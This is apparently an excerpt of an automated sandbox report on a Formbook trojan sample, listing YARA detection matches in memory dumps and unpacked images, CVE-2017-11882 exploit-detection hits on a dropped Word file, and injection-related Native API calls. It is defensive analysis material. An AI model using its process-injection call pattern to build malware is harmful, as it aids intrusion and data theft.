          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00AF3F92 appears 132 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00AF373B appears 245 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00AAE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00B1F970 appears 84 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00AADF5C appears 121 times
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00322548 NtQuerySystemInformation, 6_2_00322548
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00322540 NtQuerySystemInformation, 6_2_00322540
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037F248 NtResumeThread, 6_2_0037F248
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037D898 NtWriteVirtualMemory, 6_2_0037D898
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037CE80 NtAllocateVirtualMemory, 6_2_0037CE80
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037D398 NtProtectVirtualMemory, 6_2_0037D398
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037DD98 NtSetContextThread, 6_2_0037DD98
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004A0178 NtClose, 6_2_004A0178
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0240B2E0 NtWriteVirtualMemory, 6_2_0240B2E0
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0240B7B0 NtCreateThreadEx, 6_2_0240B7B0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A360 NtCreateFile, 9_2_0041A360
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A410 NtReadFile, 9_2_0041A410
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A490 NtClose, 9_2_0041A490
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A540 NtAllocateVirtualMemory, 9_2_0041A540
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A35A NtCreateFile, 9_2_0041A35A
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A40A NtReadFile, 9_2_0041A40A
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A48F NtClose, 9_2_0041A48F
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A53C NtAllocateVirtualMemory, 9_2_0041A53C
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA00C4 NtCreateFile, LdrInitializeThunk, 9_2_00AA00C4
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA0078 NtResumeThread, LdrInitializeThunk, 9_2_00AA0078
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA0048 NtProtectVirtualMemory, LdrInitializeThunk, 9_2_00AA0048
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9F9F0 NtClose, LdrInitializeThunk, 9_2_00A9F9F0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9F900 NtReadFile, LdrInitializeThunk, 9_2_00A9F900
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FAE8 NtQueryInformationProcess, LdrInitializeThunk, 9_2_00A9FAE8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FAD0 NtAllocateVirtualMemory, LdrInitializeThunk, 9_2_00A9FAD0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FBB8 NtQueryInformationToken, LdrInitializeThunk, 9_2_00A9FBB8
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FB68 NtFreeVirtualMemory, LdrInitializeThunk, 9_2_00A9FB68
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FC90 NtUnmapViewOfSection, LdrInitializeThunk, 9_2_00A9FC90
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FC60 NtMapViewOfSection, LdrInitializeThunk, 9_2_00A9FC60
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FD8C NtDelayExecution, LdrInitializeThunk, 9_2_00A9FD8C
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FDC0 NtQuerySystemInformation, LdrInitializeThunk, 9_2_00A9FDC0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FEA0 NtReadVirtualMemory, LdrInitializeThunk, 9_2_00A9FEA0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FED0 NtAdjustPrivilegesToken, LdrInitializeThunk, 9_2_00A9FED0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FFB4 NtCreateSection, LdrInitializeThunk, 9_2_00A9FFB4
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA10D0 NtOpenProcessToken, 9_2_00AA10D0
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA0060 NtQuerySection, 9_2_00AA0060
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA01D4 NtSetValueKey, 9_2_00AA01D4
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA010C NtOpenDirectoryObject, 9_2_00AA010C
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA1148 NtOpenThread, 9_2_00AA1148
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA07AC NtCreateMutant, 9_2_00AA07AC
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9F8CC NtWaitForSingleObject, 9_2_00A9F8CC
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9F938 NtWriteFile, 9_2_00A9F938
